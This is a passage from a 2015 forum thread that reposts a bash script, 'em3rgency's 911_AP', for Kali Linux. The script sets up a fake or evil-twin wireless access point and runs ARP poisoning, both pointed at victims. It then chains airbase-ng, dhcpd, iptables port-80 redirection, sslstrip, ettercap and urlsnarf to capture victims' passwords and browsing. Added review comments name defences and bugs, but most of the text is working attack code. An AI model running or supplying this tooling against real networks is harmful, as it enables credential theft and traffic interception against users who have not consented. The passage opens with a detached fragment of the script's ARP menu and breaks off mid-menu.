  "              *    1.  Attack entire Gateway through LAN       *"
  "              *    2.  Attack entire Gateway through Wireless  *"
  "              *    3.  Attack single host through LAN          *"
  "              *    4.  Attack single host through Wireless     *"
  "              *    5.  Return to Main Menu                     *"
  "              **************************************************"
)
for arp_menu_row in "${arp_menu_rows[@]}"; do
  printf '%s\n' "${RED}${arp_menu_row}"
done
printf '%s\n' "${STAND}"
printf '\n'
printf '%s\n' "${BLUE}                           Select Menu Option: "
read menuoption
if [ $menuoption = "1" ]; then
# ARP submenu option 1: gateway and every host, over the wired interface.
# For defenders: this class of activity shows up as IP-to-MAC mappings for the
# gateway changing on the LAN; Dynamic ARP Inspection on the switches or
# static ARP entries for the gateway are the usual mitigations.
echo
echo
echo "                This should be your Gateway from what I see: "
echo ""
echo ""
route -n -A inet | grep UG
echo ""
echo ""
echo $STAND"Please type the IP of your Gateway in below: "$STAND
# The answer is not validated and is placed unquoted into the ettercap target.
read GATEWAY
echo $BLUE"                         Starting attack on Gateway"
echo ""
echo ""
echo "                   Passwords will show up in ettercap window"
sleep 3
# Forwarding on, so intercepted traffic is passed on by this host.
echo "1" > /proc/sys/net/ipv4/ip_forward

# Port redirection: only tcp/80 is diverted to local port 10000; traffic that
# starts on 443 is not touched by this rule.
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sleep 2

# URLSnarf, window logged to the session folder.
sudo xterm -bg blue -fg white -geometry 80x7-0+25 -l -lf /root/$SESSION/urlsnarf-$(date +%F-%H%M).txt -e urlsnarf  -i $ETH0 &
sleep 2

# Ettercap, window logged to the session folder. By the script's own wording
# this output contains passwords, so the log is plain-text credential data.
xterm -bg blue -fg white -geometry 80x7-0+366 -s -sb -si +sk -sl 5000 -l -lf /root/$SESSION/ettercap$(date +%F-%H-%M).txt -e ettercap -Tq -i $ETH0 -M arp:remote /$GATEWAY/ // &
sleep 2

# SSLstrip
sudo xterm -bg blue -fg white -geometry 80x7-0+193 -e sslstrip -f -p -k 10000 &
sleep 2

# Follows sslstrip.log (path relative to the start directory) with tail -f.
xterm -bg blue -fg white -geometry 80x7-0+539 -T SSLStrip-Log -l -lf /root/$SESSION/sslstrip$(date +%F-%H-%M).txt -e tail -f sslstrip.log &
sleep 2

clear
echo $RED"    ####################################################################"
echo $RED"    [          em3rgency's ARP poisoning script is now running         ]"
echo $RED"    [                                                                  ]"
echo $RED"    [                Press ENTER return to the Main Menu               ]"
echo $RED"    [                                                                  ]"
echo $RED"    [             IF not closed properly ERRORS WILL OCCUR             ]"
echo $RED"    ####################################################################"$STAND
read ENTERKEY

# Teardown by process name, run on any ENTER.
# NOTE(review): "killall xterm" ends every xterm on the host, not only the four
# opened here, and the iptables commands delete all filter and nat rules and
# user chains rather than just the one REDIRECT rule added above; a host
# firewall present before the run is not restored.
killall sslstrip
killall ettercap
killall urlsnarf
killall xterm
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

./911_AP.sh
else
if [ $menuoption = "2" ]; then
# ARP submenu option 2: gateway and every host, over the wireless interface.
# Same steps as option 1 with $WIFACE in place of $ETH0.
echo $BLUE"              This should be your gateway from what I see: "$STAND
echo ""
echo ""
route -n -A inet | grep UG
echo ""
echo ""
echo $BLUE"Please type the IP of your gateway: "$STAND
# The answer is not validated and is placed unquoted into the ettercap target.
read GATEWAY
echo $BLUE"                      Starting attack on gateway"
echo ""
echo ""
echo ""
echo "                Passwords will show up in ettercap window"
sleep 3

# Forwarding on, so intercepted traffic is passed on by this host.
echo "1" > /proc/sys/net/ipv4/ip_forward

# URLSnarf, window logged to the session folder.
sudo xterm -bg blue -fg white -geometry 80x7-0+25 -l -lf /root/$SESSION/urlsnarf-$(date +%F-%H%M).txt -e urlsnarf -i $WIFACE &
sleep 2

# Port redirection: only tcp/80 is diverted to local port 10000.
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sleep 2

# Ettercap, window logged to the session folder (plain-text credential data
# by the script's own wording).
sudo xterm -bg blue -fg white -geometry 80x7-0+193 -l -lf /root/$SESSION/ettercap$(date +%F-%H-%M).txt -e ettercap -Tq -i $WIFACE -M arp:remote /$GATEWAY/ // &
sleep 2

# SSLstrip
sudo xterm -bg blue -fg white -geometry 80x7-0+366 -e sslstrip -f -p -k 10000 &
sleep 2

# Follows sslstrip.log (path relative to the start directory) with tail -f.
xterm -bg blue -fg white -geometry 80x7-0+539 -T SSLStrip-Log -l -lf /root/$SESSION/sslstrip$(date +%F-%H-%M).txt -e tail -f sslstrip.log &
sleep 2

clear
echo $RED"    ####################################################################"
echo $RED"    [          em3rgency's ARP poisoning script is now running         ]"
echo $RED"    [                                                                  ]"
echo $RED"    [                Press ENTER return to the Main Menu               ]"
echo $RED"    [                                                                  ]"
echo $RED"    [             IF not closed properly ERRORS WILL OCCUR             ]"
echo $RED"    ####################################################################"$STAND
read ENTERKEY

# Teardown by process name, run on any ENTER.
# NOTE(review): "killall xterm" ends every xterm on the host, and the iptables
# commands delete all filter and nat rules and user chains rather than just
# the REDIRECT rule added above; a pre-existing host firewall is not restored.
killall sslstrip
killall ettercap
killall urlsnarf
killall xterm
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

./911_AP.sh
else
if [ $menuoption = "3" ]; then
# ARP submenu option 3: one host and the gateway, labelled "through LAN".
echo ""
echo ""
echo $BLUE"              This should be your gateway from what I see: "
echo ""
echo ""
route -n -A inet | grep UG
echo ""
echo ""
echo $STAND"Please type the IP of your gateway: "
# Neither address is validated; both are placed unquoted into the ettercap
# target specification.
read GATEWAY3
echo ""
echo ""
echo "Please type the IP of the target host: "
read HOST3
echo ""
echo $BLUE"                      Starting Attack on Target Host"
echo ""
echo ""
echo "                Passwords will show up in ettercap window"
sleep 3

# Forwarding on, so intercepted traffic is passed on by this host.
echo "1" > /proc/sys/net/ipv4/ip_forward

# URLsnarf, window logged to the session folder.
sudo xterm -bg blue -fg white -geometry 80x7-0+25 -l -lf /root/$SESSION/urlsnarf-$(date +%F-%H%M).txt -e urlsnarf -i $ETH0 &
sleep 2

# Port redirection: only tcp/80 is diverted to local port 10000.
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sleep 2

# Ettercap, window logged to the session folder (plain-text credential data
# by the script's own wording).
# NOTE(review): unlike the other three submenu options no "-i" interface is
# passed here, although $ETH0 was collected for the LAN case.
sudo xterm -bg blue -fg white -geometry 80x7-0+193 -l -lf /root/$SESSION/ettercap$(date +%F-%H-%M).txt -e ettercap -TqM ARP:REMOTE /$GATEWAY3/ /$HOST3/ &
sleep 2

# SSLstrip
sudo xterm -bg blue -fg white -geometry 80x7-0+366 -e sslstrip -f -p -k 10000 &
sleep 2

# Follows sslstrip.log (path relative to the start directory) with tail -f.
xterm -bg blue -fg white -geometry 80x7-0+539 -T SSLStrip-Log -l -lf /root/$SESSION/sslstrip$(date +%F-%H-%M).txt -e tail -f sslstrip.log &
sleep 2

clear
echo $RED"    ####################################################################"
echo $RED"    [          em3rgency's ARP poisoning script is now running         ]"
echo $RED"    [                                                                  ]"
echo $RED"    [                Press ENTER return to the Main Menu               ]"
echo $RED"    [                                                                  ]"
echo $RED"    [             IF not closed properly ERRORS WILL OCCUR             ]"
echo $RED"    ####################################################################"
read ENTERKEY

# Teardown by process name, run on any ENTER.
# NOTE(review): "killall xterm" ends every xterm on the host, and the iptables
# commands delete all filter and nat rules and user chains rather than just
# the REDIRECT rule added above; a pre-existing host firewall is not restored.
killall sslstrip
killall ettercap
killall urlsnarf
killall xterm
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

./911_AP.sh
else
if [ $menuoption = "4" ]; then
# ARP submenu option 4: one host and the gateway, over the wireless interface.
echo ""
echo ""
echo $BLUE"This should be your Gateway from what I see: "
echo ""
route -n -A inet | grep UG
echo ""
echo ""
echo $STAND"Please type the IP of your gateway: "
# Neither address is validated; both are placed unquoted into the ettercap
# target specification.
read GATEWAY4
echo ""
echo "Please type the IP of the target host: "
read HOST4
echo ""
echo $BLUE"                     Starting Attack on Target Host"
echo ""
echo ""
echo "                Passwords will show up in ettercap window"
sleep 3

# Forwarding on, so intercepted traffic is passed on by this host.
echo "1" > /proc/sys/net/ipv4/ip_forward

# URLsnarf, window logged to the session folder.
sudo xterm -bg blue -fg white -geometry 80x7-0+25 -l -lf /root/$SESSION/urlsnarf-$(date +%F-%H%M).txt -e urlsnarf -i $WIFACE &
sleep 2

# Port redirection: only tcp/80 is diverted to local port 10000.
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sleep 2

# Ettercap, window logged to the session folder (plain-text credential data
# by the script's own wording).
sudo xterm -bg blue -fg white -geometry 80x7-0+193 -l -lf /root/$SESSION/ettercap$(date +%F-%H-%M).txt -e ettercap -Tq -i $WIFACE -M arp:remote /$GATEWAY4/ /$HOST4/ &
sleep 2

# SSLstrip
sudo xterm -bg blue -fg white -geometry 80x7-0+366 -e sslstrip -f -p -k 10000 &
sleep 2

# Follows sslstrip.log (path relative to the start directory) with tail -f.
xterm -bg blue -fg white -geometry 80x7-0+539 -T SSLStrip-Log  -l -lf /root/$SESSION/sslstrip$(date +%F-%H-%M).txt -e tail -f sslstrip.log &
sleep 2

clear
echo $RED"    ####################################################################"
echo $RED"    [          em3rgency's ARP poisoning script is now running         ]"
echo $RED"    [                                                                  ]"
echo $RED"    [                Press ENTER return to the Main Menu               ]"
echo $RED"    [                                                                  ]"
echo $RED"    [             IF not closed properly ERRORS WILL OCCUR             ]"
echo $RED"    ####################################################################"
read ENTERKEY

# Teardown by process name, run on any ENTER.
# NOTE(review): "killall xterm" ends every xterm on the host, and the iptables
# commands delete all filter and nat rules and user chains rather than just
# the REDIRECT rule added above; a pre-existing host firewall is not restored.
killall sslstrip
killall ettercap
killall urlsnarf
killall xterm
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

./911_AP.sh
clear

# NOTE(review): no "else" precedes these lines, so they are still part of the
# option-4 branch. The "Invalid option" message and a second relaunch therefore
# run after every option-4 session, and never for an actually invalid answer.
echo $RED"                Invalid option, you must choose 1,2,3,4 or 5.."
sleep 2
echo $BLUE"                          Re-Launching Script..."
./911_AP.sh

fi
fi
fi
fi
if [ $menuoption = "5" ]; then
./911_AP.sh
fi
else

# A script to quickly tell whose on your network in real time.
if [ $menuoption = "5" ]; then
# Main-menu option 5: ask for an interface and the gateway address, then run
# netdiscover against <gateway>/24 in a foreground xterm. The menu is
# relaunched once that window has closed and ENTER has been pressed.
clear
printf '%s\n' "${BLUE}           This will show all The clients connected to The network"
printf '\n'
sleep 3
clear
printf '\n\n'
printf '%s\n' "${STAND}Please type the name of your network interface Example: eth0 "
read IFACE
printf '\n\n'
printf '%s\n' "               This should be your gateway from what I see: "
route -n -A inet | grep UG
sleep 1
printf '\n\n'
printf '%s\n' "${STAND}Please type in the IP address of your gateway"
read GATEWAY
sleep 2
clear
printf '\n\n\n'
printf '%s\n' "${BLUE}                   Press CTRL C to stop close netdiscover"
printf '\n\n'
netdiscover_banner=(
  "    ####################################################################"
  "    [           em3rgency's Netdiscover script is now running          ]"
  "    [                                                                  ]"
  "    [                Press ENTER return to the Main Menu               ]"
  "    [                                                                  ]"
  "    [             IF not closed properly ERRORS WILL OCCUR             ]"
  "    ####################################################################"
)
for banner_row in "${netdiscover_banner[@]}"; do
  printf '%s\n' "${RED}${banner_row}"
done

# Both answers stay unquoted and unvalidated, exactly as before.
sudo xterm -bg blue -fg white -e netdiscover -i $IFACE -r $GATEWAY/24
read ENTERKEY
clear
./911_AP.sh

else
if [ $menuoption = "6" ]; then
exit
fi
fi
fi
fi
fi
fi
"He who passes not his days in the realm of dreams is the slave of the days."

ch3rn0byl

  • Guest
Re: em3rgency 911_AP Script
« Reply #14 on: June 02, 2015, 05:20:30 PM »
https://github.com/crypiehef/911_AP.sh



You wanna know how I found it?

I pasted the link that was no longer available into the google search bar.

Then I accessed the cached link. The cached link had the git-hub address.

Heres another cool trick: I am going to paste the code here too, you know, just in case it goes missing from git-hub  8)

#!/bin/bash
# updated mar 4th 2015
# script coded by em3rgency
# script updated by crypiehef to work with Kali Linux
# 911_AP version 1.1 (kali)
# xwininfo -id $(xprop -root | awk '/_NET_ACTIVE_WINDOW\(WINDOW\)/{print $NF}')
# This script creates a FAKE Access Points and loads the tools to enumerate connected clients. And it actually works!
# Also includes workin ARP poisoning features.
# Tested and working on kali Linux, Needs to have version 1.3 of dhcp3-server to work correctly
# Works with ISC DHCP Server now. Readme needs to be updated with ISC config instructions.

#DEFINED COLOR SETTINGS
RED=$(tput setaf 1 && tput bold)
GREEN=$(tput setaf 2 && tput bold)
STAND=$(tput sgr0)
BLUE=$(tput setaf 6 && tput bold)

echo ""
echo ""
echo ""
echo $RED"              +############################################+"
echo $RED"              +    em3rgency's Fake AP SSL MITM script     +"
echo $RED"              +                                            +"
echo $RED"              +                Version 1.1                 +"
echo $RED"              +                                            +"
echo $RED"              +           www.em3rgency.com                +"
echo $RED"              +############################################+"
echo ""
echo $BLUE"     Visit http://www.em3rgency.com for updates to this script. Thanks"
echo ""
echo ""
sleep 3
clear

echo $BLUE"                    em3rgency's MITM script Version 1.1 !"
echo
echo $RED"              ************************************************";
echo $RED"              *    1.  Prerequsites and Updates              *";
echo $RED"              *    2.  Run FAKE AP Static                    *";
echo $RED"              *    3.  Run EVIL TWIN AP                      *";
echo $RED"              *    4.  Run Standard ARP poison               *";
echo $RED"              *    5.  Netdiscover connected clients         *";
echo $RED"              *    6.  EXIT                                  *";
echo $RED"              ************************************************";
echo ""

echo $BLUE"                          Select Menu Option:"
read menuoption
if [ $menuoption = "1" ]; then
clear
echo ""
echo $RED"                   **************************************";
echo $RED"                   *    1.  Run apt-get update          *";
echo $RED"                   *    2.  Run apt-get upgrade         *";
echo $RED"                   *    3.  Distribution upgrade        *";
echo $RED"                   *    4.  Edit etter.conf             *";
echo $RED"                   *    5.  Edit DHCP tunnel interface  *";
echo $RED"                   *    6.  Install Dhcp3-server        *";
echo $RED"                   *    7.  Update aircrack-ng          *";
echo $RED"                   *    8.  Return to Main Menu         *";
echo $RED"                   **************************************";

echo $BLUE"                           Select Menu Option:"$STAND
read menuoption
if [ $menuoption = "1" ]; then

#This command will look for any upgrades to your OS distro.
sudo apt-get update
clear
./911_AP.sh
else

#This command will look for any upgrades to your OS distro.
if [ $menuoption = "2" ]; then
sudo apt-get upgrade
clear
./911_AP.sh
else

#This command will look for any distribution upgrades to your OS distro.
if [ $menuoption = "3" ]; then
sudo apt-get dist-upgrade
clear
./911_AP.sh
else

#This command edit etter.conf
if [ $menuoption = "4" ]; then
nano /etc/etter.conf
clear
./911_AP.sh
else

#This command will edit your tunnel interface
if [ $menuoption = "5" ]; then
nano /etc/default/isc-dhcp-server
clear
./911_AP.sh
else

#This command will Install DHCP3-server on BT5r3
if [ $menuoption = "6" ]; then
apt-get install dhcp3-server
clear
./911_AP.sh
else

#This command will update aircrack-ng to the latest nightly build
if [ $menuoption = "7" ]; then
sudo airodump-ng-oui-update
clear
else
if [ $menuoption = "8" ]; then
./911_AP.sh
fi
fi
fi
fi
fi
fi
fi
fi
else

if [ $menuoption = "2" ]; then
#This command will RUN The STATIC FAKE AP attack
sleep 2

# Collect the run parameters interactively: gateway IP, uplink interface,
# wireless interface, ESSID and log folder name.
# NOTE(review): none of these answers is validated before later commands use
# them, mostly unquoted, in a script that runs as root.
echo
echo $BLUE"                   [+] Lets get started shall we [+]"
echo $STAND""
echo ""
# Print the routing-table entries flagged UG (the default gateway) so the
# address can be read off for the next prompt.
route -n -A inet | grep UG
echo ""
echo ""
echo "Enter the gateway IP address, Shown above. Example 192.168.1.1: "
# NOTE(review): read without -r treats backslashes in the answer as escapes;
# the same applies to every read below.
read -e gatewayip
clear
echo -n "Enter your interface that is connected to the internet, Example eth0: "
read -e internet_interface
clear
echo -n "Enter your interface to be used for the fake AP, Example wlan1: "
read -e fakeap_interface
clear
echo -n "Enter the ESSID you would like your rogue AP to be called: "
read -e ESSID
clear
echo -n "Name the folder you want to save your logs into "
read -e SESSION
# Creates the session directory under /root.
# NOTE(review): $SESSION is unquoted and unchecked. A name containing spaces
# or glob characters is split/expanded into several mkdir arguments, and a
# name containing ../ resolves outside /root. Quoting the path and rejecting
# "/" and ".." in the answer would confine the directory to /root/<name>.
mkdir -p /root/$SESSION
clear

echo $BLUE"              Starting Airmon-ng and creating mon0 interface...."$STAND
airmon-ng start $fakeap_interface
fakeap=$fakeap_interface
fakeap_interface="mon0"
sleep 2
clear

echo $RED"          [##########################################################]"
echo $RED"  [+][+][+]              Running MITM attack vectors                 [+][+][+]"
echo $RED"          [##########################################################]"
sleep 5
echo ""

# Dhcpd directory and dhcpd.conf creation.
# Writes a config for 10.0.0.0/24 that leases 10.0.0.30-10.0.0.60 and names
# 10.0.0.1 as both router and DNS server. The file is overwritten on each run.
# NOTE(review): $ESSID is pasted into the file without escaping; a double
# quote, semicolon or newline in the typed name produces a malformed or
# altered dhcpd.conf.
mkdir -p "/var/run/dhcpd"
echo "authoritative;
default-lease-time 700;
max-lease-time 8000;
subnet 10.0.0.0 netmask 255.255.255.0 {
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;
option domain-name "\"$ESSID\"";
option domain-name-servers 10.0.0.1;
range 10.0.0.30 10.0.0.60;
}" > /var/run/dhcpd/dhcpd.conf

# FAKEAP setup.
# Starts airbase-ng inside its own xterm as a background job; $! is the PID of
# that xterm, kept in fakeapid for the teardown step.
echo $BLUE"             Configuring and Starting your FAKE Access Point...."
xterm -bg blue -fg white -geometry 100x7+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -c 1 -e "$ESSID" $fakeap_interface & fakeapid=$!
sleep 3
echo ""

# Interface addressing and iptables setup. Everything below changes host-wide
# network state.
echo $BLUE"                     Configuring your IP tables...."
ifconfig lo up
# at0 is configured after fixed sleeps only; presumably it is the interface
# created by the airbase-ng window above - nothing checks that it exists.
ifconfig at0 up &
sleep 1
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
# NOTE(review): these four commands delete every rule and user-defined chain
# in the filter and nat tables, including any firewall the host already had.
# Nothing is saved first, so the previous ruleset cannot be restored later.
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
# Turns on IPv4 forwarding for the whole host; the previous value is not
# recorded.
echo 1 > /proc/sys/net/ipv4/ip_forward
# Rewrites the destination of all UDP traffic reaching PREROUTING (no
# interface or port match) to $gatewayip, which is unquoted and unvalidated.
iptables -t nat -A PREROUTING -p udp -j DNAT --to $gatewayip
# Sets the default FORWARD policy to ACCEPT. The teardown later in this
# option flushes rules but never resets this policy.
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
# Source-NATs everything leaving through the uplink interface.
iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE
# Redirects TCP port 80 arriving on any interface to local port 10000.
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
echo ""

#  DHCP
echo $BLUE"              Setting up DHCP to work with $ESSID...."
touch /var/run/dhcpd.pid
chown root:root /var/run/dhcpd.pid
xterm -bg blue -fg white -geometry 80x7-0+25 -T DHCP -e dhcpd -d -f -cf "/var/run/dhcpd/dhcpd.conf" at0 & dhcpid=$!
sleep 3
echo ""

# SSLstrip
echo $BLUE"            Starting SSLstrip to enumerate user credentials...."
sudo xterm  -bg blue -fg white -geometry 80x7-0+193 -T sslstrip -e sslstrip -f -p -k 10000 & sslstripid=$!
sleep 2
echo ""

# Ettercap
echo $BLUE"               Starting Ettercap to sniff client passwords...."
xterm -bg blue -fg white -geometry 80x7-0+366 -T ettercap -s -sb -si +sk -sl 5000 -l -lf /root/$SESSION/ettercap$(date +%F-%H-%M).txt -e ettercap -p -u -T -q -i at0 & ettercapid=$!
sleep 3
echo ""

# URLSnarf
echo $BLUE"          Starting URLSnarf to show the websites the victim browses...."
xterm -bg blue -fg white -geometry 80x7-0+539 -l -lf /root/$SESSION/urlsnarf-$(date +%F-%H%M).txt -e urlsnarf -i $internet_interface & urlsnarfid=$!
sleep 3
clear

# SSLstrip.log cat the file sslstrip.log
xterm -bg blue -fg white -geometry 80x7-0-25 -T SSLStrip-Log -l -lf /root/$SESSION/sslstrip$(date +%F-%H-%M).txt -e tail -f sslstrip.log & sslstriplogid=$!

clear
echo
echo $RED"    ####################################################################"
echo $RED"    [        em3rgency's Fake AP SSL MITM attack is now running...     ]"
echo $RED"    [                                                                  ]"
echo $RED"    [     Press Y then ENTERKEY to close kill and clean up the script  ]"
echo $RED"    [                                                                  ]"
echo $RED"    [             IF not closed properly ERRORS WILL OCCUR             ]"
echo $RED"    ####################################################################"
echo ""
echo ""
read WISH

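# Teardown: on confirmation, stop the helper windows, take the wireless
# interface out of monitor mode and undo the forwarding/NAT changes, then exit.
# The banner asks for "Y", so both cases are accepted. Previously only a
# lowercase "y" matched: an uppercase answer skipped the whole cleanup and
# left IP forwarding and the NAT redirect rules active on the host. Quoting
# the selector also stops an empty answer from breaking the test.
case "$WISH" in
  y | Y)
    echo
    echo $BLUE"                           Cleaning up your mess"$STAND
    echo ''
    sleep 2

    # Signal only the helpers whose PID was actually recorded. dritnetid is
    # never assigned in this option, and an empty expansion used to run a bare
    # "kill", which only prints a usage error.
    for helper_pid in "$fakeapid" "$dhcpid" "$sslstripid" "$ettercapid" \
      "$urlsnarfid" "$dritnetid" "$sslstriplogid"; do
      if [ -n "$helper_pid" ]; then
        kill "$helper_pid"
      fi
    done

    airmon-ng stop "$fakeap_interface"
    airmon-ng stop "$fakeap"
    # Forwarding is forced off rather than restored to its earlier value.
    echo "0" > /proc/sys/net/ipv4/ip_forward
    # NOTE(review): this removes every rule in the filter and nat tables, not
    # only the ones this script added, and the FORWARD policy that the setup
    # switched to ACCEPT is not reset here. The host's original ruleset was
    # never saved, so it cannot be put back.
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    clear
    echo ""
    echo ""
    echo $RED"             [+][+][+]     Everything is now cleaned up    [+][+][+]"
    echo $RED"             [+][+][+]Please visit http://www.em3rgency.com[+][+][+]"
    echo $RED"             [+][+][+]          Coded by em3rgency         [+][+][+]"
    sleep 5
    exit
    ;;
esac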

sleep 3
clear

./911_AP.sh
else

# This command will RUN The EVIL TWIN AP attack
if [ $menuoption = "3" ]; then
sleep 3

# Configuring your Network interfaces
echo
echo $BLUE"                       [+] Lets get started shall we [+]"$STAND
echo ""
echo ""
route -n -A inet | grep UG
echo ""
echo ""
echo ""
echo "Enter the gateway IP address, Shown above. Example 192.168.1.1: "
read -e gatewayip
clear
echo -n "Enter your interface that is connected to the internet, Example eth0: "
read -e internet_interface
clear
echo -n "Enter your interface to be used for the fake AP, Example wlan1: "
read -e fakeap_interface
clear
echo -n "Enter the ESSID you would like your rogue AP to be called: "
read -e ESSID
clear
echo -n "Name the folder you want to save your logs into "
read -e SESSION
clear
mkdir -p /root/$SESSION
clear

echo $BLUE"               Starting Airmon-ng and creating mon0 interface...."$STAND
airmon-ng start $fakeap_interface
fakeap=$fakeap_interface
fakeap_interface="mon0"
sleep 2
clear

echo $RED"          [##########################################################]"
echo $RED"  [+][+][+]              Running MITM attack vectors                 [+][+][+]"
echo $RED"          [##########################################################]"
sleep 5
echo ""

# Dhcpd directory and dhcpd.conf creation
mkdir -p "/var/run/dhcpd"
echo "authoritative;
default-lease-time 700;
max-lease-time 8000;
subnet 10.0.0.0 netmask 255.255.255.0 {
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;
option domain-name "\"$ESSID\"";
option domain-name-servers 10.0.0.1;
range 10.0.0.30 10.0.0.60;
}" > /var/run/dhcpd/dhcpd.conf

# FAKEAP setup
echo $BLUE"                     Configuring and Starting $ESSID...."
xterm -bg blue -fg white -geometry 100x7+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -c 1 -P -C 60 -e "$ESSID" $fakeap_interface & fakeapid=$!
sleep 3
echo ""

# Interface addressing and iptables setup. Everything below changes host-wide
# network state.
echo "                          Configuring your IP tables...."
ifconfig lo up
# at0 is configured after fixed sleeps only; presumably it is the interface
# created by the airbase-ng window started above - nothing checks that it
# exists.
ifconfig at0 up &
sleep 1
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
# NOTE(review): these four commands delete every rule and user-defined chain
# in the filter and nat tables, including any firewall the host already had.
# Nothing is saved first, so the previous ruleset cannot be restored later.
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
# Turns on IPv4 forwarding for the whole host; the previous value is not
# recorded.
echo 1 > /proc/sys/net/ipv4/ip_forward
# Rewrites the destination of all UDP traffic reaching PREROUTING (no
# interface or port match) to $gatewayip, which is unquoted and unvalidated.
iptables -t nat -A PREROUTING -p udp -j DNAT --to $gatewayip
# Sets the default FORWARD policy to ACCEPT. The teardown later in this
# option flushes rules but never resets this policy.
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
# Source-NATs everything leaving through the uplink interface.
iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE
# Redirects TCP port 80 arriving on any interface to local port 10000.
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
echo ""

#  DHCP
echo "                   Setting up DHCP to work with EVIL TWIN AP...."
touch /var/run/dhcpd.pid
chown root:root /var/run/dhcpd.pid
xterm -bg blue -fg white -geometry 80x7-0+25 -T DHCP -e dhcpd -d -f -cf "/var/run/dhcpd/dhcpd.conf" at0 & dhcpid=$!
sleep 3
echo ""

# SSLstrip
echo "               Starting SSLstrip to enumerate user credentials...."
sudo xterm -bg blue -fg white -geometry 80x7-0+193 -T sslstrip -e sslstrip -f -p -k 10000 & sslstripid=$!
sleep 2
echo ""

# Ettercap
echo "                 Starting Ettercap to sniff client passwords...."
xterm -bg blue -fg white -geometry 80x7-0+366 -T ettercap -s -sb -si +sk -sl 5000 -l -lf /root/$SESSION/ettercap$(date +%F-%H-%M).txt -e ettercap -p -u -T -q -i at0 & ettercapid=$!
sleep 3
echo ""

# URLSnarf
echo "            Starting URLSnarf to show the websites the victim browses...."
xterm -bg blue -fg white -geometry 80x7-0+539 -l -lf /root/$SESSION/urlsnarf-$(date +%F-%H%M).txt -e urlsnarf -i $internet_interface & urlsnarfid=$!
sleep 3
clear

#SSLstrip.log cat the file sslstrip.log
xterm -bg blue -fg white -geometry 80x7-0-25 -T SSLStrip-Log -l -lf /root/$SESSION/sslstrip$(date +%F-%H-%M).txt -e tail -f sslstrip.log & sslstriplogid=$!

clear
echo
echo $RED"     ####################################################################"
echo $RED"     [        em3rgency's Fake AP SSL MITM attack is now running...     ]"
echo $RED"     [                                                                  ]"
echo $RED"     [    Press Y then ENTERKEY to close kill and clean up the script   ]"
echo $RED"     [                                                                  ]"
echo $RED"     [             IF not closed properly ERRORS WILL OCCUR             ]"
echo $RED"     ####################################################################"
echo $STAND""
echo ""
read WISH

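# Teardown: on confirmation, stop the helper windows, take the wireless
# interface out of monitor mode and undo the forwarding/NAT changes. Control
# then continues to the menu relaunch that follows this block.
# The banner asks for "Y", so both cases are accepted. Previously only a
# lowercase "y" matched: an uppercase answer skipped the whole cleanup and
# left IP forwarding and the NAT redirect rules active on the host. Quoting
# the selector also stops an empty answer from breaking the test.
case "$WISH" in
  y | Y)
    echo
    echo $BLUE"                           Cleaning up your mess"
    echo ''
    sleep 2

    # Signal only the helpers whose PID was actually recorded. dritnetid is
    # never assigned in this option, and an empty expansion used to run a bare
    # "kill", which only prints a usage error.
    for helper_pid in "$fakeapid" "$dhcpid" "$sslstripid" "$ettercapid" \
      "$urlsnarfid" "$dritnetid" "$sslstriplogid"; do
      if [ -n "$helper_pid" ]; then
        kill "$helper_pid"
      fi
    done

    airmon-ng stop "$fakeap_interface"
    airmon-ng stop "$fakeap"
    # Forwarding is forced off rather than restored to its earlier value.
    echo "0" > /proc/sys/net/ipv4/ip_forward
    # NOTE(review): this removes every rule in the filter and nat tables, not
    # only the ones this script added, and the FORWARD policy that the setup
    # switched to ACCEPT is not reset here. The host's original ruleset was
    # never saved, so it cannot be put back.
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    clear
    echo ""
    echo ""
    echo $RED"             [+][+][+]     Everything is now cleaned up    [+][+][+]"
    echo $RED"             [+][+][+]Please visit http://www.em3rgency.com[+][+][+]"
    echo $RED"             [+][+][+]          Coded by em3rgency         [+][+][+]"$STAND
    sleep 5
    ;;
esac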

sleep 3
clear
./911_AP.sh
else

# Credits to N1t0g3n for the base to this section. Thanks bro
if [ $menuoption = "4" ]; then
clear
echo ""
echo ""
echo $BLUE"                  Finding wireless and ethernet interfaces."$STAND
sleep 3
echo ""
ifconfig -a | cut -d " " -f1 | sed '/^$/d' | egrep -v 'lo|vm'
echo ""
echo ""
echo "Please type the name of your wireless interface (wlan0): "
read WIFACE
sleep 2
echo ""
echo ""
echo "Please type the name of your ethernet interface (eth0): "
read ETH0
clear
echo -n "Name the folder you want to save your logs into "
read -e SESSION

mkdir -p /root/$SESSION
clear
echo ""
echo ""
clear
echo $RED"              **************************************************";
